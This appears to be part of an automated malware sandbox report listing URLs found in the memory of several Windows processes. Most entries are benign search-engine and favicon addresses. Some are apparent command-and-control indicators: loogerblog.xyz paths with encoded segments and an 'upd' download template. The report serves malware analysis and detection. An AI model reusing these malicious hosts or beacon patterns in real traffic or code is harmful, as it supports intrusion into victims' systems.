            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://br.search.yahoo.com/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://browse.guardian.co.uk/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://browse.guardian.co.uk/favicon.ico
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://busca.buscape.com.br/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://busca.buscape.com.br/favicon.ico
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://busca.estadao.com.br/favicon.ico
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://busca.igbusca.com.br/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://busca.igbusca.com.br//app/static/images/favicon.ico
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://busca.orange.es/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://busca.uol.com.br/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://busca.uol.com.br/favicon.ico
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://buscador.lycos.es/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://buscador.terra.com.br/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://buscador.terra.com/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://buscador.terra.com/favicon.ico
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://buscador.terra.es/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://buscar.ozu.es/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://buscar.ya.com/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://busqueda.aol.com.mx/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://cerca.lycos.it/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://cgi.search.biglobe.ne.jp/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://cgi.search.biglobe.ne.jp/favicon.ico
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://clients5.google.com/complete/search?hl=
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://cnet.search.com/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://cnweb.search.live.com/results.aspx?q=
            Source: powershell.exe, 00000017.00000003.465679265.0000028A7BBE0000.00000004.00000001.sdmp, explorer.exe, 0000001E.00000003.485625992.00000000027C0000.00000004.00000001.sdmp, control.exe, 0000001F.00000003.476423106.000002B016990000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000021.00000002.698167834.0000021DB8A36000.00000004.00000001.sdmp, rundll32.exe, 00000023.00000003.489434106.000001ED55180000.00000004.00000001.sdmpString found in binary or memory: http://constitution.org/usdeclar.txt
            Source: powershell.exe, 00000017.00000003.465679265.0000028A7BBE0000.00000004.00000001.sdmp, explorer.exe, 0000001E.00000003.485625992.00000000027C0000.00000004.00000001.sdmp, control.exe, 0000001F.00000003.476423106.000002B016990000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000021.00000002.698167834.0000021DB8A36000.00000004.00000001.sdmp, rundll32.exe, 00000023.00000003.489434106.000001ED55180000.00000004.00000001.sdmpString found in binary or memory: http://constitution.org/usdeclar.txtC:
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://corp.naukri.com/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://corp.naukri.com/favicon.ico
            Source: powershell.exe, 00000017.00000003.520930888.0000028A7B721000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
            Source: WerFault.exe, 00000025.00000003.525110655.0000000004E24000.00000004.00000001.sdmpString found in binary or memory: http://crl.micro
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://de.search.yahoo.com/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://es.ask.com/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://es.search.yahoo.com/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://esearch.rakuten.co.jp/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://espanol.search.yahoo.com/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://espn.go.com/favicon.ico
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://find.joins.com/
            Source: explorer.exe, 0000001E.00000000.502226332.000000000B1A0000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://fr.search.yahoo.com/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://google.pchome.com.tw/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://home.altervista.org/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://home.altervista.org/favicon.ico
            Source: powershell.exe, 00000017.00000003.465679265.0000028A7BBE0000.00000004.00000001.sdmp, explorer.exe, 0000001E.00000003.485625992.00000000027C0000.00000004.00000001.sdmp, control.exe, 0000001F.00000003.476423106.000002B016990000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000021.00000002.698167834.0000021DB8A36000.00000004.00000001.sdmp, rundll32.exe, 00000023.00000003.489434106.000001ED55180000.00000004.00000001.sdmpString found in binary or memory: http://https://file://USER.ID%lu.exe/upd
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://ie.search.yahoo.com/os?command=
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://ie8.ebay.com/open-search/output-xml.php?q=
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://image.excite.co.jp/jp/favicon/lep.ico
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://images.joins.com/ui_c/fvc_joins.ico
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://images.monster.com/favicon.ico
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://img.atlas.cz/favicon.ico
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://img.shopzilla.com/shopzilla/shopzilla.ico
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://in.search.yahoo.com/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://it.search.dada.net/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://it.search.dada.net/favicon.ico
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://it.search.yahoo.com/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://jobsearch.monster.com/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://kr.search.yahoo.com/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://list.taobao.com/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://list.taobao.com/browse/search_visual.htm?n=15&amp;q=
            Source: explorer.exe, 0000001E.00000002.704498511.00000000045BE000.00000004.00000001.sdmpString found in binary or memory: http://loogerblog.xyz/favicon.ico
            Source: explorer.exe, 0000001E.00000000.499102380.0000000008455000.00000004.00000001.sdmpString found in binary or memory: http://loogerblog.xyz/images/NIcuL5NVjxwM/2GiryhKI5_2/FNJaA9fYIAvcIp/w_2B_2BISN4Xz1NACkLBL/pkU7CWqAn
            Source: explorer.exe, 0000001E.00000002.692987327.0000000000EE0000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000021.00000000.488015831.0000021DB5F90000.00000002.00000001.sdmpString found in binary or memory: http://loogerblog.xyz/images/heS41tWM4/dTuObjanXSKYXyb0FkTo/Sul08DWWYjtvEXiZbeu/IttDYgTEILEomnf
            Source: explorer.exe, 0000001E.00000002.704498511.00000000045BE000.00000004.00000001.sdmpString found in binary or memory: http://loogerblog.xyz/images/heS41tWM4/dTuObjanXSKYXyb0FkTo/Sul08DWWYjtvEXiZbeu/IttDYgTEILEomnfMBe_2
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://mail.live.com/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://mail.live.com/?rru=compose%3Fsubject%3D
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://msk.afisha.ru/
            Source: powershell.exe, 00000017.00000002.545875762.0000028A10065000.00000004.00000001.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://ocnsearch.goo.ne.jp/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://openimage.interpark.com/interpark.ico
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://p.zhongsou.com/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://p.zhongsou.com/favicon.ico
            Source: powershell.exe, 00000017.00000002.522033208.0000028A0020E000.00000004.00000001.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://price.ru/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://price.ru/favicon.ico
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://recherche.linternaute.com/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://recherche.tf1.fr/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://recherche.tf1.fr/favicon.ico
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://rover.ebay.com
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://ru.search.yahoo.com
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://sads.myspace.com/
            Source: powershell.exe, 00000017.00000002.521630583.0000028A00001000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search-dyn.tiscali.it/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.about.com/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.alice.it/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.alice.it/favicon.ico
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.aol.co.uk/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.aol.com/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.aol.in/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.atlas.cz/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.auction.co.kr/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.auone.jp/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.books.com.tw/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.books.com.tw/favicon.ico
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.centrum.cz/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.centrum.cz/favicon.ico
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.chol.com/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.chol.com/favicon.ico
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.cn.yahoo.com/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.daum.net/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.daum.net/favicon.ico
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.dreamwiz.com/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.dreamwiz.com/favicon.ico
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.co.uk/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.com/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.com/favicon.ico
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.de/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.es/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.fr/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.in/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.it/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.empas.com/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.empas.com/favicon.ico
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.espn.go.com/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.gamer.com.tw/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.gamer.com.tw/favicon.ico
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.gismeteo.ru/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.goo.ne.jp/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.goo.ne.jp/favicon.ico
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.hanafos.com/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.hanafos.com/favicon.ico
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.interpark.com/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.ipop.co.kr/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.ipop.co.kr/favicon.ico
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=IEFM1&amp;q=
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=SO2TDF&amp;q=
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=SOLTDF&amp;q=
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?q=
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.livedoor.com/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.livedoor.com/favicon.ico
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.lycos.co.uk/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.lycos.com/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.lycos.com/favicon.ico
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.msn.co.jp/results.aspx?q=
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.msn.co.uk/results.aspx?q=
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.msn.com.cn/results.aspx?q=
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.msn.com/results.aspx?q=
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.nate.com/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.naver.com/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.naver.com/favicon.ico
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.nifty.com/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.orange.co.uk/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.orange.co.uk/favicon.ico
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.rediff.com/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.rediff.com/favicon.ico
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.seznam.cz/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.seznam.cz/favicon.ico
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.sify.com/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.yahoo.co.jp
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.yahoo.co.jp/favicon.ico
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.yahoo.com/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.yahoo.com/favicon.ico
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.yahooapis.jp/AssistSearchService/V2/webassistSearch?output=iejson&amp;p=
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.yam.com/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search1.taobao.com/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search2.estadao.com.br/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://searchresults.news.com.au/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://service2.bfast.com/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://sitesearch.timesonline.co.uk/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://so-net.search.goo.ne.jp/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://suche.aol.de/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://suche.freenet.de/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://suche.freenet.de/favicon.ico
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://suche.lycos.de/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://suche.t-online.de/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://suche.web.de/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://suche.web.de/favicon.ico
            Source: explorer.exe, 0000001E.00000000.496563368.00000000075A0000.00000002.00000001.sdmpString found in binary or memory: http://treyresearch.net
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://tw.search.yahoo.com/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://udn.com/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://udn.com/favicon.ico
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://uk.ask.com/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://uk.ask.com/favicon.ico
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://uk.search.yahoo.com/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://vachercher.lycos.fr/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://video.globo.com/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://video.globo.com/favicon.ico
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://web.ask.com/
            Source: explorer.exe, 0000001E.00000000.496563368.00000000075A0000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.com
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.abril.com.br/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.abril.com.br/favicon.ico
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.afisha.ru/App_Themes/Default/images/favicon.ico
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.alarabiya.net/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.alarabiya.net/favicon.ico
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.co.jp/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.co.uk/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.com/exec/obidos/external-search/104-2981279-3455918?index=blended&amp;keyword=
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.com/favicon.ico
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.com/gp/search?ie=UTF8&amp;tag=ie8search-20&amp;index=blended&amp;linkCode=qs&amp;c
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.de/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.aol.com/favicon.ico
            Source: explorer.exe, 0000001E.00000000.502226332.000000000B1A0000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
            Source: powershell.exe, 00000017.00000002.522033208.0000028A0020E000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.arrakis.com/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.arrakis.com/favicon.ico
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.asharqalawsat.com/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.asharqalawsat.com/favicon.ico
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.ask.com/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.auction.co.kr/auction.ico
            Source: explorer.exe, 0000001E.00000002.691931764.000000000095C000.00000004.00000020.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.baidu.com/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.baidu.com/favicon.ico
            Source: explorer.exe, 0000001E.00000000.502226332.000000000B1A0000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.cdiscount.com/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.cdiscount.com/favicon.ico
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.ceneo.pl/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.ceneo.pl/favicon.ico
